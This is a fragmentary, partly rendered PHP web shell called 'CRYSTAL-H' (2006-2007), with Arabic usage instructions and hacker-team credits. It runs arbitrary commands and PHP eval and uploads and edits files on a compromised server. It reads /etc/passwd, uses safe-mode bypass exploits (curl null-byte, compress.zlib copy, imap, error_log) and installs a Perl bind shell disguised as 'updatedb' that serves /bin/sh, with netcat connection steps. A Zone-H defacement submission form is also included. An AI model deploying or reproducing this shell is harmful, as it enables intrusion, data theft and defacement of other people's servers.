CRYSTAL-H Crystal hack shellphp 2006-2007

ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe-mode: $hsafemode"); // PHPINFO if ($_GET['action'] == "phpinfo") { echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() bị cấm"; exit; } $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} echo("
"); echo("Open base dir: $hopenbasedir"); echo("
"); echo "PostgreSQL: "; $pg_on = @function_exists('pg_connect'); if($pg_on){echo "ON";}else{echo "OFF
";} echo("
"); echo "MSSQL: "; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo "ON";}else{echo "OFF";} echo("
"); echo "MySQL: "; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo "ON"; } else { echo "OFF"; } echo("
"); echo "PHP version: ".@phpversion().""; echo("
"); echo "cURL: ".(($curl_on)?("ON"):("OFF")); echo("
"); echo "Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); ?>

 

 

 

OS:  

Server:  

User:
1:

    Back ً phpinfo2  Tools4   Decoderi   ByPass`   SQLآ  Bindآ help sabout ?

[j server : CGI v:           HTTP v:  Mail admin:          
:  IP  SERVER:                           port :

السلام عليكم ورحمة الله وبركاته

عزيزي المستخدم
اذا اردت المساعدة اضغط على اسم الخيار الموضح باللون الازرق
وستظهر لك معلومات الخيار .
";} if ($act == "bindport"){ echo "
/bin/bash Port
"; } if ($act == "tools"){ echo "
File to edit:
"; echo "
"; echo "
Download here from: -->>:
"; } if ($act == "about") {echo "
Coding by:

Super-Crystal
&
Mohajer22
-----
Thanks
TrYaG Team
ArabSecurityCenter Team
CRYSTAL-H Version:0 Beta phpshell code
Saudi Arabic .
";} if ($act == "bind") {echo "
CRYSTAL-H:

-Connect قم بالضغط على خيار.
.- بعد مايتم انزال السكريبت بالمجلد
.-توجه لاداة النت كات وتصنت على
nc -lp 3333بكتابة المنفذ -
السكريبت بلغة البيرل
Bind port to :
bind shell وهنيئا ً لك .
";} if ($act == "command") {echo "
CRYSTAL-H:

لأختيار الاوامر الجاهزه Select ------ x اضغط على الخيار
.- واذا اردت كتابه الاوامر بنفسك قد تكتفي بالخيار
Command .
";} if ($act == "team") {echo "
Arab Security Center Team

Super-Crystal
Medo-HaCKer
Anaconda
Alsb0r
ReeM-HaCK
NoOFa
AL-Alame
The YounG HackeR
Anti-Hack
Thanks .
";} if (array_key_exists('image', $_GET)) { header('Content-Type: image/gif'); die(getimage($_GET['image'])); } if ($act == "bypass") { echo "
Execute:
"; echo (" bypass safemode with copy "); echo "
read file :
"; echo (" bypass safemode with CuRl"); echo "
read file :
"; echo (" bypass safemode with imap()"); echo "
"; echo (" bypass safemode with id()"); echo "
"; echo (" Exploit: error_log()"); echo "
"; } if ($act == "decoder"){ echo (" replace Chr()"); echo "

"; } if ($act == "SQL"){ echo (" MySQL "); echo "
Username : \n password : \n \n
"; } ?>

 

 
Exploit: error_log() By * Super-Crystal *
By * Super-Crystal * TrYaG Team
", 3,$ERORR); } // id // if ($_POST['plugin'] ){ switch($_POST['plugin']){ case("cat /etc/passwd"): for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "
"; } } break; } } // imap // $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); $str = imap_body($stream, 1); if (!empty($str)) echo "
".$str."
"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "
";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]"."

 

" ; echo "
"; imap_close($stream); } // CURL // if(empty($_POST['curl'])){ } else { $m=$_POST['curl']; $ch = curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); curl_exec($ch); var_dump(curl_exec($ch)); } // copy// $u1p=""; $tymczas=""; if(empty($_POST['copy'])){ } else { $u1p=$_POST['copy']; $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$u1p, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "".htmlspecialchars($tekst).""; unlink($temp); } else { die("
Sorry... File ".htmlspecialchars($u1p)." dosen't exists or you don't have access.
"); } } @$dir = $_POST['dir']; $dir = stripslashes($dir); @$cmd = $_POST['cmd']; $cmd = stripslashes($cmd); $REQUEST_URI = $_SERVER['REQUEST_URI']; $dires = ''; $files = ''; if (isset($_POST['port'])){ $bind = " #!/usr/bin/perl \$port = {$_POST['port']}; \$port = \$ARGV[0] if \$ARGV[0]; exit if fork; $0 = \"updatedb\" . \" \" x100; \$SIG{CHLD} = 'IGNORE'; use Socket; socket(S, PF_INET, SOCK_STREAM, 0); setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1); bind(S, sockaddr_in(\$port, INADDR_ANY)); listen(S, 50); while(1) { accept(X, S); unless(fork) { open STDIN, \"<&X\"; open STDOUT, \">&X\"; open STDERR, \">&X\"; close X; exec(\"/bin/sh\"); } close X; } ";} function decode($buffer){ return convert_cyr_string ($buffer, 'd', 'w'); } function execute($com) { if (!empty($com)) { if(function_exists('exec')) { exec($com,$arr); echo implode(' ',$arr); } elseif(function_exists('shell_exec')) { echo shell_exec($com); } elseif(function_exists('system')) { echo system($com); } elseif(function_exists('passthru')) { echo passthru($com); } } } function perms($mode) { if( $mode & 0x1000 ) { $type='p'; } else if( $mode & 0x2000 ) { $type='c'; } else if( $mode & 0x4000 ) { $type='d'; } else if( $mode & 0x6000 ) { $type='b'; } else if( $mode & 0x8000 ) { $type='-'; } else if( $mode & 0xA000 ) { $type='l'; } else if( $mode & 0xC000 ) { $type='s'; } else $type='u'; $owner["read"] = ($mode & 00400) ? 'r' : '-'; $owner["write"] = ($mode & 00200) ? 'w' : '-'; $owner["execute"] = ($mode & 00100) ? 'x' : '-'; $group["read"] = ($mode & 00040) ? 'r' : '-'; $group["write"] = ($mode & 00020) ? 'w' : '-'; $group["execute"] = ($mode & 00010) ? 'x' : '-'; $world["read"] = ($mode & 00004) ? 'r' : '-'; $world["write"] = ($mode & 00002) ? 'w' : '-'; $world["execute"] = ($mode & 00001) ? 'x' : '-'; if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 
's' : 'S'; if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; $s=sprintf("%1s", $type); $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); return trim($s); } if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "") { copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]); } if((isset($_POST['fileto']))||(isset($_POST['filefrom']))) { $data = implode("", file($_POST['filefrom'])); $fp = fopen($_POST['fileto'], "wb"); fputs($fp, $data); $ok = fclose($fp); if($ok) { $size = filesize($_POST['fileto'])/1024; $sizef = sprintf("%.2f", $size); print "
Download - OK. (".$sizef."??)
"; } else { print "
Something is wrong. Download - IS NOT OK
"; } } if (isset($_POST['installbind'])){ if (is_dir($_POST['installpath']) == true){ chdir($_POST['installpath']); $_POST['installpath'] = "temp.pl";} $fp = fopen($_POST['installpath'], "w"); fwrite($fp, $bind); fclose($fp); exec("perl " . $_POST['installpath']); chdir($dir); } @$ef = stripslashes($_POST['editfile']); if ($ef){ $fp = fopen($ef, "r"); $filearr = file($ef); $string = ''; $content = ''; foreach ($filearr as $string){ $string = str_replace("<" , "<" , $string); $string = str_replace(">" , ">" , $string); $content = $content . $string; } echo "
Edit file: $ef

"; fclose($fp); } if(isset($_POST['savefile'])){ $fp = fopen($_POST['savefile'], "w"); $content = stripslashes($content); fwrite($fp, $content); fclose($fp); echo "
saved -OK!
"; } if (isset($_POST['php'])){ echo "
eval code

"; } if(isset($_POST['phpcode'])){ echo "
Results of PHP execution

"; @eval(stripslashes($_POST['phpcode'])); echo "
"; } if ($cmd){ if($sertype == "winda"){ ob_start(); execute($cmd); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } else{ ob_start(); echo decode(execute($cmd)); $buffer = ""; $buffer = ob_get_contents(); ob_end_clean(); } if (trim($buffer)){ echo "
Command: $cmd
"; } } $arr = array(); $arr = array_merge($arr, glob("*")); $arr = array_merge($arr, glob(".*")); $arr = array_merge($arr, glob("*.*")); $arr = array_unique($arr); sort($arr); echo ""; foreach ($arr as $filename) { if ($filename != "." and $filename != ".."){ if (is_dir($filename) == true){ $directory = ""; $directory = $directory . "";} else{ $directory = $directory . ""; } if (is_readable($filename) == true){ $directory = $directory . "";} else{ $directory = $directory . ""; } $dires = $dires . $directory; } if (is_file($filename) == true){ $file = ""; $file = $file . "";} else{ $file = $file . ""; } if (is_readable($filename) == true){ $file = $file . "";} else{ $file = $file . ""; } $files = $files . $file; } } } echo $dires; echo $files; echo "
NameTypeSizeLast accessLast changePermsWriteRead
$filename" . filetype($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); if (is_writable($filename) == true){ $directory = $directory . "YesNoYesNo
$filename" . filetype($filename) . "" . filesize($filename) . "" . date("G:i j M Y",fileatime($filename)) . "" . date("G:i j M Y",filemtime($filename)) . "" . perms(fileperms($filename)); if (is_writable($filename) == true){ $file = $file . "YesNoYes
No

"; echo "
Command: Directory:
"; if (ini_get('safe_mode') == 1){echo "
SAFE MOD IS ON
Including from here: " . ini_get('safe_mode_include_dir') . "
Exec here: " . ini_get('safe_mode_exec_dir'). "
";} ?>



< 


:: Executed command ::

Command:"; ?> f

 

Selectg 
Bind port toآ

::Edit/Create file::"

 التحرير والانشاء:

قم بوضع اسم الملف الذي تريد تحريره فقط
وبعد ذالك الضغط على config.php مثال
Edit
ستظهر لك نافذه بها محتويات الملف
وايضا ً اذا اردت انشاء ملف فقط ضع اسمه مع الامتداد
وبعد ذالك اكتب ماتريد washer-crystal.txt .
";} ?>

 

File to edit:

"; ?>

رفع الملفات:

قم بتحديد الملف المراد رفعه
وبعد ذالك قم بالضغط على الخيار الموضح
UPLOAD< .
";} ?>:: upload::Ņ

 
"; ?>

 Defacer Zone-H

 

CRYSTAL-H:

اسم المعلن Defacer
الموقع المخترق Victim
وضع الاختراق اي نوع الثغره التى استثمرتها Attack Mode
سبب الاختراق Attack Reason
لارسال الاختراق sand
لرؤيه اخر التحذيرات المرسله بالموقع Attacks On Hold.
";} ?>

Defacer Zone-h

 
::Defacer:::è
::Victim:::è
Attack Mode:è
Attack Reason:è
 
  :   L Attacks On Hold L


 yCrystal shell v. 1 beta  ©oded by TrYaG Team l Arab Security Center Team |securityCenter| : Web x

 

 
CRYSTAL-H 2006